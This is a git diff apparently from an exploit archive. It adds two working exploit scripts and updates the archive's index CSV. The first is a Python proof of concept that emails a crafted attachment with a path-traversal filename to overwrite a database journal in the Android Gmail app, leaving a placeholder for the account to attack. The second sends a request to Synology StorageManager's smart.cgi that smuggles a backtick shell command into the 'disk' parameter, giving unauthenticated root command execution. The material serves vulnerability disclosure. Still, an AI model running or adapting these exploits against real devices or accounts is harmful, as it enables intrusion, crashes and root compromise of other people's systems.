diff --git a/exploits/android/dos/43189.py b/exploits/android/dos/43189.py new file mode 100755 index 000000000..9c325289a --- /dev/null +++ b/exploits/android/dos/43189.py @@ -0,0 +1,115 @@ +''' +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1342 + +There is a directory traversal issue in attachment downloads in Gmail. For non-gmail accounts, there is no path sanitization on the attachment filename in the email, so when attachments are downloaded, a file with any name and any contents can be written to anywhere on the filesystem that the Gmail app can access. This bug has the following limitations: + +1) the email address has to be a non-Gmail and non Gmailified (Hotmail or Yahoo) account +2) the file can not overwrite an existing file, it has to be a file that doesn't already exist +3) there user has to click to download the attachment (and the path looks a bit weird on the screen) + +It is possible to modify a EmailProviderBody database using this bug by placing a journal file in the databases directory. + +Below is a PoC of an email that causes this issue. Attached is a python script that will send an email that causes this issue (don't forget to add in the to and from addresses, and your Gmail credentials). WARNING: this PoC will cause Gmail to crash repeatedly, and you will need to re-install it to get it to work again + +Content-Type: multipart/mixed; boundary="--- +-714A286D976BF3E58D9D671E37CBCF7C" +MIME-Version: 1.0 +Subject: hello +To:
+From: natashenka@google.com + +You will not see this in a MIME-aware mail reader. + +------714A286D976BF3E58D9D671E37CBCF7C +Content-Type: text/html + +test + +------714A286D976BF3E58D9D671E37CBCF7C +Content-Type: audio/wav; name="../../../../data/data/com.google.android.gm/databases/EmailProviderBody.db-journal" +Content-Transfer-Encoding: base64 +Content-Disposition: attachment; filename="test" + +2dUF+SChY9f/////AAAAABAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRyb2lkX21l +dGFkYXRhYW5kcm9pZF9tZXRhZGF0YQNDUkVBVEUgVEFCTEUgAAAARlkAAABFSgAAAEs7AAAASSw= + +------714A286D976BF3E58D9D671E37CBCF7C +''' + +import os +import sys +import smtplib +import mimetypes + +from optparse import OptionParser + +from email import encoders +from email.message import Message +from email.mime.audio import MIMEAudio +from email.mime.base import MIMEBase +from email.mime.image import MIMEImage +from email.mime.multipart import MIMEMultipart +from email.mime.text import MIMEText +import subprocess +import random + + +def main(): + + + + FROM_ADDRESS = "YOUR FROM ADDRESS HERE" + YOUR_CREDENTIAL = "GET A GOOGLE ACCOUNT TEMPORARY PASSWORD AND PUT IT HERE" + TO_ADDRESS = "ACCOUNT TO ATTACK HERE" + + + + composed = """Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="----714A286D976BF3E58D9D671E37CBCF7C" +MIME-Version: 1.0 +Subject: hello image2adfdfs1 +To: """+ TO_ADDRESS +""" +From: """ + FROM_ADDRESS + """ + +You will not see this in a MIME-aware mail reader. + +------714A286D976BF3E58D9D671E37CBCF7C +Content-Type: text/html + +test + +------714A286D976BF3E58D9D671E37CBCF7C +Content-Type: audio/wav; name="../../../../data/data/com.google.android.gm/databases/EmailProviderBody.db-journal" +Content-Transfer-Encoding: base64 +Content-Disposition: attachment; filename="%2e%2e%2fqpng" + +2dUF+SChY9f/////AAAAABAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRyb2lkX21l +dGFkYXRhYW5kcm9pZF9tZXRhZGF0YQNDUkVBVEUgVEFCTEUgAAAARlkAAABFSgAAAEs7AAAASSw= + +------714A286D976BF3E58D9D671E37CBCF7C""" + + + + + s = smtplib.SMTP_SSL("smtp.gmail.com") + s.login(FROM_ADDRESS, YOUR_CREDENTIAL) + you = TO_ADDRESS + s.sendmail(FROM_ADDRESS, you, composed) + s.quit() + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/cgi/webapps/43190.py b/exploits/cgi/webapps/43190.py new file mode 100755 index 000000000..ff565fec3 --- /dev/null +++ b/exploits/cgi/webapps/43190.py @@ -0,0 +1,67 @@ +''' +SSD Advisory – Synology StorageManager smart.cgi Remote Command Execution + +Full report: https://blogs.securiteam.com/index.php/archives/3540 +Twitter: @SecuriTeam_SSD +Weibo: SecuriTeam_SSD + + +Vulnerability Summary +The following advisory describes a remote command execution vulnerability +found in Synology StorageManager. + +Storage Manager is “a management application that helps you organize and +monitor the storage capacity on your Synology NAS. Depending on the model +and number of installed hard drives, Storage Manager helps you accomplish +the following tasks: + +Create different types of RAID and non-RAID storage configurations, such as +volumes, disk/RAID groups, iSCSI LUNs, and iSCSI Targets. +Monitor the overall storage usage of your Synology NAS. +Inspect the health of installed hard drives and solid state drives. +Use advanced options, such as hot spare drives, SSD TRIM, SSD cache, and +more.” + +Credit +An independent security researcher, Nigusu Kassahun, has reported this +vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program + +Vendor response +Synology has released patches to address this vulnerability – DSM 5.2-5967-5 + +For more information: https://www.synology.com/en-global/releaseNote/DS210+ + +Vulnerability details +User controlled input is not sufficiently sanitized, and then passed to +execve function. + +Successful exploitation of this vulnerability enables a remote +unauthenticated user to run commands as root on the machine. + +The vulnerable parameter can be found in +/webman/modules/StorageManager/smart.cgi with parameter +action=apply&operation=quick&disk=%2Fdev%2Fsda + +Proof of Concept + +=== +''' + +# Synology StorageManager <= 5.2 Remote Root Command Execution + + +import httplib + + +HOST = raw_input("Enter Host: ") + + +#IDOR to bypass auth and ticks to chain commands + +conn = httplib.HTTPConnection(HOST) + +conn.request("GET","/webman/modules/StorageManager/smart.cgi?action=apply&operation=quick&disk=/dev/sda`id%20>/tmp/LOL`") + +res = conn.geresponse() + +print res.status, res.reason \ No newline at end of file diff --git a/exploits/hardware/webapps/32667.pdf b/exploits/hardware/webapps/32667.pdf deleted file mode 100644 index 6089659d9..000000000 --- a/exploits/hardware/webapps/32667.pdf +++ /dev/null @@ -1 +0,0 @@ -pdf \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f3f4fe907..6cbb0bc3b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5760,6 +5760,7 @@ id,file,description,date,author,type,platform,port 43184,exploits/multiple/dos/43184.txt,"Exim 4.89 - 'BDAT' Denial of Service",2017-11-27,meh,dos,multiple, 43185,exploits/windows/dos/43185.pl,"KMPlayer 4.2.2.4 - Denial of Service",2017-11-22,R.Yavari,dos,windows, 43186,exploits/windows/dos/43186.pl,"Winamp Pro 5.66.Build.3512 - Denial of Service",2017-11-22,R.Yavari,dos,windows, +43189,exploits/android/dos/43189.py,"Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download",2017-11-28,"Google Security Research",dos,android, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9145,7 +9146,7 @@ id,file,description,date,author,type,platform,port 40810,exploits/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,local,linux, 40811,exploits/lin_x86-64/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,local,lin_x86-64, 40812,exploits/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation",2013-12-16,spender,local,linux, -40839,exploits/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-28,FireFart,local,linux, +40839,exploits/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-28,FireFart,local,linux, 40847,exploits/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-27,"Gabriele Bonacini",local,linux, 40848,exploits/windows/local/40848.java,"WinPower 4.9.0.4 - Local Privilege Escalation",2016-11-29,"Kacper Szurek",local,windows, 40859,exploits/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows, @@ -26169,7 +26170,7 @@ id,file,description,date,author,type,platform,port 22048,exploits/php/webapps/22048.txt,"News Evolution 1.0/2.0 - Include Undefined Variable Command Execution",2002-11-26,frog,webapps,php, 22050,exploits/cgi/webapps/22050.txt,"BizDesign ImageFolio 2.x/3.0.1 - 'imageFolio.cgi?direct' Cross-Site Scripting",2002-11-27,SecurityTracker.com,webapps,cgi, 22051,exploits/cgi/webapps/22051.txt,"BizDesign ImageFolio 2.x/3.0.1 - 'nph-build.cgi' Cross-Site Scripting",2002-11-27,SecurityTracker.com,webapps,cgi, -22052,exploits/cgi/webapps/22052.txt,"YaBB 1 Gold - SP 1 YaBB.pl Cross-Site Scripting",2002-11-28,"Fabricio Angeletti",webapps,cgi, +22052,exploits/cgi/webapps/22052.txt,"YaBB 1 Gold SP 1 - 'YaBB.pl' Cross-Site Scripting",2002-11-28,"Fabricio Angeletti",webapps,cgi, 22065,exploits/php/webapps/22065.html,"phpBB 2.0.3 - 'search.php' Cross-Site Scripting",2002-12-03,f_a_a,webapps,php, 22070,exploits/windows/webapps/22070.py,"OTRS 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",webapps,windows, 22071,exploits/php/webapps/22071.txt,"WordPress Plugin FireStorm Professional Real Estate 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",webapps,php, @@ -32715,7 +32716,6 @@ id,file,description,date,author,type,platform,port 32664,exploits/ios/webapps/32664.txt,"iShare Your Moving Library 1.0 iOS - Multiple Vulnerabilities",2014-04-02,Vulnerability-Lab,webapps,ios,8080 32665,exploits/php/webapps/32665.txt,"Kloxo 6.1.18 Stable - Cross-Site Request Forgery",2014-04-02,"Necmettin COSKUN",webapps,php,7778 32666,exploits/php/webapps/32666.txt,"Kloxo-MR 6.5.0 - Cross-Site Request Forgery",2014-04-02,"Necmettin COSKUN",webapps,php,7778 -32667,exploits/hardware/webapps/32667.pdf,"NetPilot/Soho Blue Router 6.1.15 - Privilege Escalation",2014-04-02,"Richard Davy",webapps,hardware,80 32668,exploits/php/webapps/32668.txt,"CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities",2014-04-03,"Blessen Thomas",webapps,php, 32669,exploits/php/webapps/32669.txt,"PHPcksec 0.2 - 'PHPcksec.php' Cross-Site Scripting",2008-12-17,ahmadbady,webapps,php, 32670,exploits/php/webapps/32670.txt,"Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0) - Unvalidated Redirects",2014-04-03,"Giuseppe D'Amore",webapps,php, @@ -38227,3 +38227,4 @@ id,file,description,date,author,type,platform,port 43158,exploits/hardware/webapps/43158.txt,"Icon Time Systems RTC-1000 Firmware 2.5.7458 - Cross-Site Scripting",2017-11-17,"Keith Thome",webapps,hardware, 43177,exploits/multiple/webapps/43177.txt,"CommuniGatePro 6.1.16 - Cross-Site Scripting",2017-11-15,"Boumediene KADDOUR",webapps,multiple, 43188,exploits/hardware/webapps/43188.txt,"ZTE ZXDSL 831CII - Improper Access Restrictions",2017-11-27,"Ibad Shah",webapps,hardware, +43190,exploits/cgi/webapps/43190.py,"Synology StorageManager 5.2 - Remote Root Command Execution",2017-11-28,SecuriTeam,webapps,cgi,